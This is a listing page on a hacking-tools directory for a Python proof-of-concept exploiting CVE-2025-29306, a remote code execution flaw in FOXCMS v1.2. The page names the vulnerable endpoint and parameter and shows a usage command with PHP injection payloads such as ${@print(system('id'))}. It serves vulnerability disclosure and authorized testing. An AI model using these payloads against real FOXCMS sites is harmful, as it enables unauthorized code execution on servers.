Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
FOXCMS-CVE-2025-29306-POC | Kitploit
Tools/GitHubGitHub/inok009/foxcms-cve-2025-29306-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubinok009/foxcms-cve-2025-29306-poc

FOXCMS-CVE-2025-29306-POC

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

FOXCMS Parameter Injection RCE – CVE-2025-29306

This repository contains a Python-based PoC for a Remote Code Execution (RCE) vulnerability affecting FOXCMS v1.2, a Chinese open-source content management system.

CVE-ID: CVE-2025-29306
Affects: FOXCMS v1.2
Type: Service Parameter Injection → Code Execution


Vulnerability Summary

FOXCMS suffers from an insecure parameter parsing mechanism in the id parameter on the /images/index.html endpoint. This allows payload injection using ${@print()} expressions, leading to PHP code execution.


PoC Usage

Requirements

  • Python 3.x
  • requests library
root@kitploit:~
pip install requests

# Usage 
python foxcms_poc.py http://target.com/images/index.html?id=

# The script uses payloads like:

${@print(phpinfo())}
${@print(system('id'))}

# 🔐 Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.

Author
Inok009
Download Tool